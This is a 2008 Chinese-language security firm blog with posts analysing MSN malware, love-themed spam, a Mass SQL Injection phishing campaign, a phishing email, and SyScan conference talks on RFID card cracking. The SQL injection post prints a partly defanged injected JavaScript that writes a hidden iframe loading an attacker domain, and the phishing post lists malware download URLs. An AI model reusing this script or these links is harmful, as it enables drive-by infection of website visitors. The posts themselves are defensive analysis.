這是我最愛的陷阱!用folder icon講檔案偽裝成folder,稍一不注意就會點進"folder"裡看看有什麼內容,實在是可愛啊!

最後丟到VirusTotal看看,嗯嗯,前天就有人上傳樣本了。用NSPack加殼過,總共還有25種防毒軟體掃得到,令人意外的是NOD32竟然掃不到,Fortinet也槓龜,這兩家國內的佔有率不低啊。

執行後的行為就不分析了,不是我的專長。(那什麼是我的專長?是唬爛...XD)

病毒、木馬、蠕蟲這些惡意程式也不是第一天出現,透過MSN傳播也很常見,這隻用到的技術也不特別,重點在於它誘使收訊者執行的手段不可輕忽,沒有技術深度,可是只要你有疏忽就會中獎。未來惡意程式技術會不斷進步深入,Packer不斷改進,唯有這社交工程技巧始終利用沒有進步的警覺心,實在是.....太方便啦~~

作者 Wisely 為阿碼科技 產品經理

繼續閱讀全文...

google說的不是我說的

這兩天的新聞:
資安之眼:電子告白信「有毒」! 甜蜜情人節被殭屍病毒纏上
PCHome:電子告白信「有毒」! 甜蜜情人節被殭屍病毒纏上...
大砲開講:七夕情人節駭客來攪局,風暴病毒邀請情人加入殭屍家族
另外還有好幾則新聞都差不多...大意是:
七夕情人節前夕,現代人喜歡用電子mail傳情說愛,但根據趨勢科技最新的Trend Labs統計卻發現,最近有一批由殭屍網路所散播含有惡意連結的垃圾郵件,郵件主旨皆與愛情有關,如:「Stand by my side」、「I want to be with you」 以及 「Lucky to have you」等告白訊息。一旦收件者因為好奇,按下郵件中所附的連結,那可能會是一場夢魘。

忍不住問了google大師,但google卻說:

可以參考此連結。
google大師告訴我,2008年6月11日那時就有這手法啦!
這是另一個blog說的:http://blog.trendmicro.com/storm-meddles-in-matters-of-the-heart/
所以...天天都是情人節的啦...

其實這類似手法已經存在一段時間了,也很常見:


都非常類似的,換湯不換藥,把手法說清楚才是重要的,都是用詐騙手法誘拐使用者下載惡意程式,執行後當然植入惡意程式。簡單的手法一變再變,只要畫面炫一點、漂亮些,總是能騙倒一堆人的...

作者 Crane 為阿碼科技 資安顧問

繼續閱讀全文...

歡迎光臨阿碼外傳!

各位好!

我們最近終於有時間把公司的blog架設起來了。阿碼從2006年一月成立到現在,許多朋友都一直建議我們能有公司的blog,但是由於大家都忙,一轉眼就過了兩年半。

最近我們一直覺得大家真的很想多認識我們,大家都知道我們專注於web資安產品,有源碼檢測、web惡意程式偵測、web防火牆等產品,經過兩年,很多都已經是我們的客戶,也熟悉我們的產品,但是對於我們這個團隊,卻很想有更深入的認識。阿碼很特別,團隊很年輕,但是做的是世界頂尖的產品;研發團隊設在台灣,但是除了許多優秀的台灣青年外,也有很多來自美國、加拿大、德國、愛爾蘭、波蘭、西班牙、瑞典、紐西蘭、印度、南非等地的菁英。我們都在研究什麼?我們最近做了哪些新的產品或功能?我們對於資安趨勢的看法?我們參加各地資安年會的心得?那些會議的內容值得去?哪些會議值得贊助?阿碼平均年齡多大?阿碼一天工作多久?阿碼自己的SSDLC如何做?我們收到了各式各樣的問題,讓我們覺得,大家對我們的了解其實很少,其實僅止於我們的產品,所以我們決定,在辦完今年SyScan之後,去BlackHat與OWASP India、OWASP US之前,我們要推出我們大家一起的blog,來與大家分享種種,也記錄阿碼的成長。

可是對於我們來說,推出公司的blog,大家很難寫文章。我們喜歡寫文章,表達自己對很多事的看法,或分享我們所做的研究,但是如果是公司的官方blog,那麼我們的看法,也將間接地代表了公司的看法。可是如果我們因此而多所顧忌,那乾脆不用寫blog,發正式的新聞稿就好了;即使寫了,也將會像很多公司的對外發言一樣,經過了層層的包裝與修飾,留給外界自行設法解讀背後的真相,這樣就完全失去了blog的意義,況且我們都不習慣也不擅長很正式(或說「很官腔」)(或乾脆說「很虛假」、「很噁心」)的表達方式。

所以我們一起決定推出一個很特別的blog。我們希望能透過這個blog讓大家多了解我們,多與我們互動,多與我們分享你們對於我們的看法與建議。這個blog只會由阿碼的團隊來寫,每一篇登出來的文,一定出自一位阿碼的成員,所以它絕對是屬於阿碼的blog。但是我們每個人將代表自己發聲,用自己的語氣,發表自己真實的意見,這些看法僅代表我們個人的看法,不代表公司的立場,所以它雖然是阿碼的blog,但是不是官方的blog,於是乎,「阿碼外傳-阿碼科技非官方Blog」誕生了。

感謝您光臨我們的blog!希望您喜歡我們的分享,也歡迎您多貼您的意見給我們!

Enjoy our blog,
Wayne
2008年八月五日於舊金山

繼續閱讀全文...

2008年8月4日

Mass SQL Injection + Phishing WebSite

因為雲端的威脅,駭客集團註冊的網域(Domain)可以發揮的空間受到壓縮,所以得善盡利用網域,於是結合Phishing WebSite來進行詐騙。駭客集團可能還有秘技來因應雲端的威脅。

先來看看下面幾張圖: (Title is "Mortgagee Union Trust Company")




眼力大考驗,看出哪裡不同嗎?哪裡又是一樣呢?在搞甚麼鬼呢?
1.URL(Domain)不同,分別為。"porv.ru"、"ncbw.ru"、"po4c.ru",這些網域都是Mass SQL Injection攻擊所植入惡意連結的網域。
2.其中"po4c.ru"已經被FireFox 3標示為"已知有害網站"。
3.三個網站內容都是一樣的,是一家銀行。google找一下"union bank"...真多,不知是真的Union Bank很多,還是有一堆是假的,所以用搜尋引擎找銀行是很危險的事。

來查查Domain註冊資料:
1.porv.ru...查詢結果
domain: PORV.RU
type: CORPORATE
nserver: ns2.porv.ru. 66.233.229.99
nserver: ns1.porv.ru. 79.184.20.160
nserver: ns3.porv.ru. 68.224.31.128
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
2.ncbw.ru...查詢結果
domain: NCBW.RU
type: CORPORATE
nserver: ns1.ncbw.ru. 75.58.125.164
nserver: ns3.ncbw.ru. 98.223.79.10
nserver: ns2.ncbw.ru. 67.81.36.254
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
3.po4c.ru...查詢結果
domain: PO4C.RU
type: CORPORATE
nserver: ns1.po4c.ru. 67.193.115.136
nserver: ns3.po4c.ru. 67.61.45.63
nserver: ns2.po4c.ru. 69.119.119.178
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 1193323
e-mail: jest1s@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.24
paid-till: 2009.07.24
source: TC-RIPN

今天是2008.08.04,網域申請日期也才沒幾天的事,上面註冊的資料也不會是真的,網域註冊是要付費的,查金流呢?查到的應該是線上刷卡的,通常也是盜刷的。等網域註冊商發現然後再取消該網域,應該也是幾天後的事了,那時駭客集團應該也在註冊另外一批網域了。
想知道還有哪些網域被註冊利用嗎?可以參考:
http://www.dynamoo.com/blog/labels/Asprox.html
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt

再來看看hxxp://porv.ru/js.js:<有的防毒軟體會將下列程式碼視為惡意程式>
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
docurnent.vvrite(''<\ifrarne src=hxxp://ncbw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0><\/ifrarne>'');
}
catch(e)
{
};
}}
其中的網域會一直變換的,駭客集團總是有用不完的網域,怪...。如果,網域有特定編碼產生,惡意程式反向連結時可以用動態編碼網域來連結,這可就屌了,現今所謂的「網站信譽評等」、「網站黑名單」機制就宣判死刑。你能想像這天嗎?我相信快了...

作者 Crane 為阿碼科技 資安顧問

本文同步張貼在這個部落格

繼續閱讀全文...

2008年7月18日

一封詐騙的電子郵件

今天一早收到一封郵件:

看起來平淡無奇,檢查超連結也沒有異常,不過就是一封垃圾郵件吧!!

開啟連結畫面(危險動作:點選郵件連結及開啟郵件附件都是危險動作):


懂些電腦的,應該可以看出異常處,但一般人呢??

不攻擊漏洞,純粹用點混淆、欺瞞手法才是攻擊最高招~~
就像魔術一樣,不懂魔術手法的人,只能看好戲~~XD

我當然不能這樣就放過它,要給它剖析一下...
先看一下郵件標題(Header):
Microsoft Mail Internet Headers Version 2.0
Received: from 200.net88.skekraft.net ([213.199.88.200]) by mailserver.co.cn with Microsoft SMTPSVC(x.x.xx.xx);
Fri, 18 Jul 2008 10:26:23 +0800
MIME-version: 1.0
Content-type: multipart/alternative;
boundary="Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)"
Message-id: <1F012145-4DF2-0768-4915-28014035C24A@tweet-garot.com>
From: Halchakar
To: support@mailserver.co.cn
Subject: Alligator attack savages 3 students on school trip
Date: Fri, 18 Jul 2008 04:26:25 +0200
X-Mailer: Apple Mail (2.924)
Return-Path: tmmatsre@tweet-garot.com
X-OriginalArrivalTime: 18 Jul 2008 02:26:24.0077 (UTC) FILETIME=[AC62C7D0:01C8E87D]

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/plain; charset=UTF-8; format=flowed
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/html; charset=UTF-8
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)--

寄件信箱-tmmatsre@tweet-garot.com,信箱網域確實存在但沒該帳號信箱,通常寄件者幾乎都是假的。
Hostname mail.tweet-garot.com
MX Priority 10
Results 220 barracuda.tweet-garot.com ESMTP d5a48418eea1c05ff8ac9d4ec4eca22e
Hostname backup-mx.choiceone.net
MX Priority 20
Results 220 bmx002.onecommunications.net ESMTP
寄件IP-213.199.88.200,在瑞典。
City Skellefteå
State/Region 23
Zipcode
Area Code 0
Country SE
Latitude 64.7667
Longitude 20.95

再來看看連結的網站:
schnittstellentechnik.de--解析IP->62.67.235.170
Domain: schnittstellentechnik.de
Nserver: ns1.evanzo.com
Nserver: ns2.evanzo.com
Changed: 2006-12-20T23:34:05+01:00

IP定址:
62.67.235.170@Germany
應該是Web Hosting上面的一個網站

惡意程式:
hxxp://schnittstellentechnik.de/watch.exe

VirusTotal:檢測結果
Result: 13/33 (39.4%)

該網站還夾帶一個攻擊碼,會攻擊IE瀏覽器漏洞,且攻擊碼有經過編碼的:
hxxp://schnittstellentechnik.de/00.html

#社交工程手法絕對是資安管理上的最大風險及弱點。
#Domains及Web Hosting已經被濫用了,這兩個管道能被杜絕,網路威脅將會大減。

作者 Crane 為阿碼科技 資安顧問

繼續閱讀全文...

2008年7月15日

阿碼 & SySCAN 共同主辦前瞻資安技術年會 2008

2008年七月,阿碼與 SySCAN 聯合在台北舉辦了SyScan 前瞻資安技術年會 2008,我把當初寫的一些東西轉貼在這裡。大會 blog 在這裡:http://syscantaiwan.blogspot.com/
大會照片:
直接前往相簿


講師的訪問 第一回:亞洲與歐美的資安會議比較



問:今年SyScan來到了台灣跟香港,你的看法如何?你覺得什麼樣的會是最酷的會?亞洲的會議,如SyScan、VNSECon、HITB等,你覺得如何?好的資安會議要有什麼樣的要素?

Adam Laurie:

亞洲的會議中,SyScan一直是我的最愛,因為他讓我可以離開歐洲跟美國,我大部分會議的時間都花在這兩個地方。SyScan也是照顧講師照顧得最好的會議。什麼要素構成好的資安會議?當然是內容,因為大家終究還是因為內容才來的...SyScan一直有最好的講師陣容,所以我能夠看到很多東西,學到很多,也認識到很多來自世界各地的頂尖資安專家。這一切讓我覺得參與SyScan是值得的。

但是我當然永遠會更喜歡 DEFCON 跟 BlckHat,因為我創立並參與這兩個會的工作至今超過十年了。另外這兩個會議的規模也比較大。

Matt Conover (Shok):

SyScan擴大了我很高興,SyScan是很好的會議,我已經參加了三次還是四次了。Thomas很好的主辦人,他會安排得很好讓講師很省事。至於其他亞洲的會議如POC、VNSECon、HITB、以及PacSec...我也希望以後能參加到。但是我如果全部都參加了我大概會因為正事都沒做而被公司開除吧! :)

無論如何,亞洲各國都有這些好的資安會議真的很棒,這些會議會培育下一代的資安專家,幫助他們永遠都有最新的資安知識與點子,並建立一個全球性的社群,我們大家可以隨時彼此聯絡並交換意見。這一點是我很喜歡的。我希望世界不要有冷戰的觀念,大家能多交流。

Rick Smith:

我覺得資安會議的擴張是非常好的,這樣更多的人能夠獲得最新的資安知識。我一直認為最好的防禦是從了解攻擊開始的,不懂得攻擊方法,要如何防禦?直於最酷的資安會議,這題很難!我在世界各地的資安會議都有演講,我覺得他們每個都有不同的好處。他們在世界各地舉辦,這表示我能接觸到世界各地的資安社群,大家成為一個全球的社群,這對我是無價的,也幫助我在 HP 的研究。小的會議,例如在維也納的 DeppSec 或者在英國的 BrumCon,可以跟小群人有很深入的討論;大型的會議如 BlackHat 跟 DEFCON 很有價值因為規模很大,同時有很多不同的主題可以選擇。這次參加SyScan,使我第一次來到亞洲,我很期待聽到亞洲講師的演講,並學到新的東西。

Fyodor Yarochkin:

我覺得台灣的資安社群似乎不是很國際化(non-internations),對於跟國外的資安社群交流似乎不是很有興趣。我不知道這是語言的或心裡障礙。還有這邊似乎大家比較不願意分享自己的研究,大家都想要有自己的團體,自己的project,自己的技術...但是分享是駭客文化中很重要的元素。

講師的訪問 第二回:世界越來越安全,還是不安全?



原始問題:With so many experiences and years in security research, where do you see security, in general, is heading today? Are we getting more secure, or insecure?

Adam Laurie:

很遺憾的,我必須說我們越來越不安全。這一方面是單純從量來看,現在我們接觸的科技(technology)太多了,每一種新的科技都會帶來新的資安問題;另一方面則是這些科技被商業上採用的速度。由於需要很快在商場上使用,每每資安的環節變成是最不重要的考量,常常是最後時刻才加上去的,也常常沒有經過仔細的思考,而事實上,資安機制應該是設計私人資訊系統(personal information systems)或付費系統時最重要的考量。

Internet上執法困難,每天高量的攻擊,數不完的弱點,跨管轄區域的不法行為,政府贊助的駭客團體,botnets以及靠botnets所支撐的地下經濟,SPAM,病毒,惡意程式,身份竊盜,釣魚,信用卡偽造,以及電子恐怖(cyber terrorism)對於基礎建設所帶來的威脅,再再都顯示,未來的危險重重。

除非我們目前偵測與防範資安問題的作法有超大幅的改變,我看不出情勢會有好轉的可能。

另一個嚴重的問題是,法律目前被扭曲以便讓有爛資安產品(poor security products)的廠商能夠獲利。另外,用法律禁止「逆向工程」(reverse-engineering)、駭客(hacking)、以及弱點的公布(disclosure)等,最後只會讓情勢惡化,而不會有任和幫助。因為這些法律,只會讓合法的資安研究員害怕去研究目前科技的漏洞,也害怕去公開這些漏洞,這樣的結果,就是這些漏洞會一直存在,讓那些台面下的不法份子持續利用。


Matt Conover (shok):


哈,這是一個很棒的問題。這個世界現在比以前都依賴電腦和Internet了。當然這確保我們資安研究員都會有飯吃(資安研究永遠需要),但是其實這有很負面的影響。今天我看到兩個極端負面的現象:

一、越來越多的駭客行為的動機是源自於利益。Internet已經變成一個非常恐怖的世界了。一般的Internet使用者,隨時都被釣魚或其他詐騙手法轟炸,要偷他們的銀行、eBay、或PayPal帳號。同樣嚴重的事,使用者被暴露在充滿惡意網站的環境,惡意的網站,惡意的廣告,或者原本合法善意的網站,但是被駭入並植入了惡意的網馬(掛馬)。

這些被植入的網站,會悄悄地設法在訪客的系統中安裝惡意程式,偷竊個人資料或把訪客的電腦變成僵屍網路的成員。駭客越來越先進了,有錢能使鬼推磨,所以我覺得資安界還有很長的路要走。

二、資安研究越來越被泛政治化。我們這行的一些行為現在竟然被認為是違法的了(美國的DMCA,在德國攜帶攻擊程式屬犯法,在法國使用加密軟體犯法...)。國與國之間常常控告對方國家執行駭客攻擊行為(俄羅斯 vs. 愛沙尼亞,中國 vs. 美國/德國...)。我擔心在網路世界(cyberspace)裡會開始發展出冷戰效應。對於我這個從青少年就因為純興趣而開始入行的資安研究員來說,這些改變讓我心寒。

Rich Smith:

資安範圍很大,這個問題不容易做整體性的回答。但是隨著我們日益依賴科技,科技濫用所導致的危險也隨之提升。無可置疑的,對於科技所帶來的危險,今天我們比往前要了解得多。只要我們保有開放的資安議題討論環境可以讓我們很公開的、真實的討論資安的種種議題(例如SyScan),那我覺得我們就會一直有進步。科技進步多快速,相對的資安問題的產生也就會有多快速,因為資安問題與新的科技是結合在一起的。所以我們越快知道一個科技的弱點,我們就能夠越早停止向現在這樣,把資安當作是事後彌補的事情,而在設計階段就加入資安的考量。

這是我看到目前我們面臨的最大挑戰,我們必須認識,資安是發展科技所必須付出的代價,資安不是我們事後靠一些解決方案就可以很便宜的彌補的。

Fyodor Yarochkin:

我對於整個資安大環境並不是很樂觀。隨著越來越多新的科技產生,而越來越少人真的懂資安,整個情勢一定是越來越糟的。尤其是大公司的目的不見得是「讓明天會更好」,加上龐大(龐...
大!!)的地下經濟的起飛:攻擊程式的買賣,惡意程式植入服務,僵屍網路的租賃服務...等等。

我個人意見,目前資安世界很有趣,可是說是兩個極端的面向。一方面,我們有光鮮亮麗的資安產業,有著好多漂亮的防火牆,入侵偵測系統,生物識別系統等等,但是另一方面,我們有著黑暗的地下面--使用者都是僵屍網路的一員,在他們的電腦上執行著僵屍或惡意程式;市場上什麼都可以用錢買到,政府的監控,非法的資安研究...;被入侵的企業打死不會承認...

講師Fyodor:我將公開適合台灣使用的RFID駭客工具


BlackHat / DefCon 創辦人之一的Adam Laurie將擔任本會講師,公開他的RFID駭客工具。來自俄羅斯的Fydor,也將在本會上公開的他最近研發的私房RFID駭客工具。

Adam所用的RFID讀卡機(reader)是在歐洲買的,走PC/SC規格,但是這種讀卡機在台灣比較難買到。Fyodor所使用的是我們台灣本地製造的讀卡機,走的是GIGA-TMS規格。這種讀卡機跟PC通訊所用的是GNetPlus協定。Fyodor寫了自己的工具可以暴力法解MIFARE卡的key--台灣很多卡都是用MIFARE,例如我們的捷運就是。很多購物中心/百貨公司的集點卡也都是。

Fyodor會當場用台灣的某某卡做示範。

最後報告到場的長官們,這種示範在 BlackHat/DEFCON 很常見,沒有像 Adam 那樣拿護照來直接試,已經非常乖了 :)

在 Adam 前面講 RFID,如果沒帶點實際的 demo,豈不遜爆了?

至於Adam 的工具請參考:

http://eecue.com/log_archive/eecue-log-726-Black_Hat_2007___Day_2___Adam_Laurie.html

http://rfidiot.org

CNET: 亞洲資安大會將首度來台 揭最新攻擊手法


http://www.zdnet.com.tw/news/software/0,2000085678,20130365,00.htm

ZDNet記者馬培治/台北報導 2008/07/02 20:10:04

以亞洲地區資訊安全議題為核心的資安大會SyScan,下週(7/7)將首次來台舉辦兩天,來自歐美等地的資安專家將齊聚,介紹最新的攻擊手法。
過去只在新加坡舉辦的亞洲前瞻資安技術年會(Symposium on Security for Asia Network),今年將首度來台舉辦分會,會中將有來自賽門鐵克、HP、COSEINC等國際知名資安公司派出的資深研究員發表最新攻擊手法與漏洞,與本地資安研究社群進行交流。

曾因利用飯店電視駭入客房資訊系統而聞名的專業駭客Adam Laurie便將首次造訪台灣,發表他近年來關注的RFID安全漏洞。Laurie在電子郵件專訪中表示,廣受歡迎的RFID應用雖然方便,但採用者卻未正視其安全問題。他舉例道,許多RFID方案被用在錯誤的方法上,例如門禁管理,便是誤把作為身份辨識功能的標籤拿來當作認證標籤,「多數標籤很容易複製,若沒有密碼等第二層認證系統來把關,把RFID用在認證上其實並不安全,」Laurie說。

而台灣眾多的硬體設備廠商可能會相當關心HP系統安全實驗室研究員Richard Smith將發表的、針對嵌入式系統發動的永久性阻斷服務攻擊(Permanent Denial of Service, PDOS)。

Smith在電子郵件訪問中表示,可透過連網進行flash記憶體上的軔體遠端更新的嵌入式設備,都可能存在PDOS漏洞,讓駭客利用遠端更新機制來破壞其flash記憶體,造成設備無法使用。

而賽門鐵克研究實驗室首席工程師Matthew Conover則將介紹該公司最新研發、用來觀察rootkit行為的沙盒(sandbox)技術,可限制惡意程式的行為僅在sandbox環境中執行,他並將在大會上首次展示該技術。

負責籌辦本次台灣SyScan的阿碼科技執行長黃耀文表示,台灣地區有相當活躍的資安研究社群,但一直以來缺乏與國際級資安專家互動的機會,透過引進SyScan至台灣舉辦,將有助於促進跨國資安研究社群的對話,「台灣的研究人員或許沒辦法去歐美參加BlackHat、DefCon等盛會,但也有機會聽到同等級講者的經驗,」他說。

資安人雜誌專訪 Matt Conover (shok)


我覺得參加會議前,先認識講師很重要。台灣的講師大家都比較熟,國外的大家比較陌生些,感謝資安人雜誌的專訪!

「過去一年以來 在個人研究領域上的轉變有很大的原因是,惡意軟體每年的增長速率已經快要趕上天文數字,以病毒碼或特徵值作為依據的廠商感受到很大的壓力,...」

「對我個人而言,目前研究如何偵測及移除rootkit是一個很現實的問題,像是之前Peacomm、Rustock、 Mebroot這些有rootkit功能的惡意程式,Mebroot是隱藏在MBR開機區的rootkit,...」

「所以,亞洲的資安問題肯定與全世界是有所差異的。而且在資安社群(info-security community)應該是有存在沒有經常交流溝通的事實,在亞洲很有名的資安專家或駭客,到了西方國家似乎就沒這麼有名,...」

「雖然亞洲與東歐地區在資安"黑市" 似乎發展蓬勃,許多複雜的惡意程式及rootkit都是出自亞洲地區,原因可能是因為沒有足夠的法律約束以及合法的資安企業來雇用這些高手,讓他在正確的地方發揮...」

http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=4480

ITHome:亞洲資安技術年會SyScan首度擴大在台舉辦


http://www.ithome.com.tw/itadm/article.php?c=49744
文/趙郁竹 2008-07-07

SyScan標榜會議特色在於探討具前瞻性的資安技術,其中RFID安全、手機、嵌入式系統的安全議題都是首日活動的重點。

以往僅在新加坡、泰國等地舉辦的亞洲資安技術年會SyScan今年首次將規模擴大至台灣、香港,今天(7/7)展開首天議程,吸引約350名台灣資安人員參加。RFID、嵌入式系統安全都是此次會中焦點。

SyScan今年舉辦第五屆,和本地資安業者阿碼科技共同合辦,這也是SyScan首次來到台灣。此次引進的講師陣容除了BlackHat、DefCon等國外知名資安會議定期講師,還包括HP、賽門鐵克的資安研究室成員。

例如全球首屈一指資安盛會BlackHat、DefCon的核心成員之一Adam Laurie此次特地來台擔任講師,探討RFID的安全議題。另外此次同樣以RFID安全為主題的Fyodor Yarochkin也長期擔任BlackHat會議講師,讓本地資安業者在國內就有和BlackHat同等的講師資源。

SyScan標榜會議特色在於探討具前瞻性的資安技術,其中RFID安全、手機、嵌入式系統的安全議題都是首日活動的重點。而Laurie正是近幾年來專注研究RFID安全的專家,他在現場就示範了如何入侵RFID系統,將身分識別卡、智慧卡(SmartPay)等資料複製盜用。

他指出,RFID現在有太多應用,例如動物的身分識別、旅館鑰匙、商品標籤等等,不過卻很少人注意到潛藏的安全性問題。「在沒有任何加密的情形下,裡面的資料很容易就被複製。」Laurie表示。而RFID漸漸被應用在如電子錢包、電子護照等等,讓安全議題顯得更加重要。

HP可信任系統研究室成員Richard Smith則在會中針對嵌入式系統安全發表新型攻擊Permananet Denial of Service(PDOS)手法,Smith也時常在BlackHat、DefCon等大型國際資安會議中擔任講師。

Smith從韌體安全(firmware)的角度來探討嵌入式裝置安全,他認為,目前主要業者的努力方向都在端點保護,而在這些裝置中,韌體常常是被忽略的一塊。

本地主辦單位阿碼科技表示,台灣資安社群反應比想像中熱烈,原本租借的場地不敷使用,還更換另一個較大的場地,共有超過300人報名。SyScan今天開始在台北共有兩天議程,明天還有國內知名資安部落格大砲開講部落客邱春樹針對惡意程式進行探討。

ITHome: 偵測系統核心木馬技術有新進展


http://www.ithome.com.tw/itadm/article.php?c=49838
文/王宏仁 (記者) 2008-07-17

核心木馬攻擊開始具有針對性,只有特定對象才會受害。賽門鐵克首席工程師來臺展示最新的木馬偵測程式,可以監控出未知驅動程式的隱藏木馬行為。



賽門鐵克資安研究室首席工程師Matthew Conover來臺展示偵測系統核心木馬(Kernel Rootkit)的新技術,將在新的防毒產品上運用這個偵測技術,讓防毒軟體可以發現過去難以偵測的「目標性(Target)木馬攻擊」。

Matthew Conover指出:「最近出現新的木馬攻擊手法,不只針對特定目標攻擊,還使用了難以發現的核心木馬感染技術,因而傳統的防毒偵測技術,很難完全發現這些隱藏在系統核心中的木馬程式。」

在木馬感染技術中,一般防毒軟體的系統執行權限,多半只能發現函式庫等級(Library Level)或應用程式等級(Application Level)的木馬,而一般防毒軟體最難預防的,正是隱藏成系統元件或驅動程式的核心木馬程式。他表示,通常只有在這些核心木馬程式發生了破壞系統的行為,否則防毒軟體很難偵測到。

Matthew Conover解釋最新出現的目標性木馬攻擊,他說:「只有遇到特定企業或機構的使用者,木馬程式才會啟動感染機制,例如顧客傳一份申請文件給銀行時,顧客打開文件不會中木馬,但是銀行行員打開文件才會啟動木馬,讓木馬潛伏期更長,風險也更大。」

過去偵測核心木馬的技術,是建立一個追蹤環境,觀察未知驅動程式的執行結果,但因為追蹤環境只是模擬使用者的一般系統環境,對需要特定條件才會啟動的目標性木馬,因為會誤判為正常的驅動程式而沒有效果。Matthew Conover所開發的偵測技術,則是建立一個監控未知驅動程式與系統溝通過程的Sandbox環境,可以在正常的使用環境中,觀察可疑程式與系統正常元件的資訊傳遞,進而發現異常的元件使用行為,例如可以發現不需要使用者輸入資料的驅動程式,卻呼叫了鍵盤指令,那這個程式就有可能是要偷取使用者輸入密碼的木馬程式。

目前賽門鐵克已經使用這個技術,來累積木馬程式的可疑行為特徵。Matthew Conover表示:「賽門鐵克會先在防毒程式中使用實驗室累積的行為特徵資料來偵測,下一階段才應用在防毒程式中,來監控未知的木馬程式。」文⊙王宏仁

網路資訊:RFID漏洞百出?


http://news.networkmagazine.com.tw/secruity/scrtnews/2008/07/07/895/
2008.07.7 陳宛綺/報導

資安大會SyScan今日於台北舉辦,邀請了國內外知名資安專家共同針對最新攻擊手法,特別是針對RFID與嵌入式系統,進行現場討論與Demo。

負責籌辦此次SyScan活動的阿碼科技執行長黃耀文表示,此次的會議分成2天進行;第一天主要邀集來自國外知名資安Forum專家,包括Adam Laurie、Matthew Conover、Richard Smith與Fyodor Yarochkin等,針對目前新式攻擊方式發表演說,第二天則主要以國內資安專家/駭客的演說為主。

對於目前使用越來越普遍的RFID,首次拜訪臺灣的Adam Laurie在此次的演講中,展現了多種利用RFID Reader即可輕鬆竊取RFID中Tag資料的方法。包括內含簡單ID/Data的「Dumb」卡,如門禁卡、動物晶片,甚至是智慧型卡片,如內含數位錢包的交通運輸卡,或是具有生物辨識的數位護照等,透過工具,其內含的資料都可以快速被複製。再加上這類RFID駭客工具的射頻範圍廣,因此只要這些駭客工具經過你身邊,就可以讀到卡片中的資料,或將卡片內的資料複製過去。

來自俄羅斯的Fyodor Yarochkin講師,則在此會議上公開的他最新研發的RFID駭客工具。Fyodor自己所寫的工具可以破解Mifare卡的key,而台北捷運所使用的即是Mifare卡。透過這些RFID駭客工具,駭客即可讀出智慧卡的資料,或是為卡片加值,或是再複製一張RFID卡;若是有照片的智慧卡,透過這些工具也可快速「製造」新使用者。

除了RFID議題之外,可攜式裝置的資安問題也受到關注。COSEINC的Petr Matousek則公開許多能夠攻陷Windows Embedded CE 6 核心,並隱藏 rootkit 的方法,以及如何偵測與監控的防禦工具介紹。HP的Richard Smith則介紹一種針對嵌入式系統設備的新型態攻擊手法:永久性DOS (Permanent Denial Of Service,PDOS);而利用一種名為Phlashing的攻擊手法即可以遠端完成PDOS攻擊。

SyScan明日在臺北還有一整天的會議,包括將公開嵌入式 script 攻擊手法,以及如何在WinCE上發現弱點,並如何有效隱藏 rootkit等技術。

作者 Wayne 為阿碼科技 CEO

繼續閱讀全文...

2008年5月20日

台灣網站遭受有史以來最大規模 SQL Injection 攻擊

無法查看此摘要。請 按這裡查看文章。
繼續閱讀全文...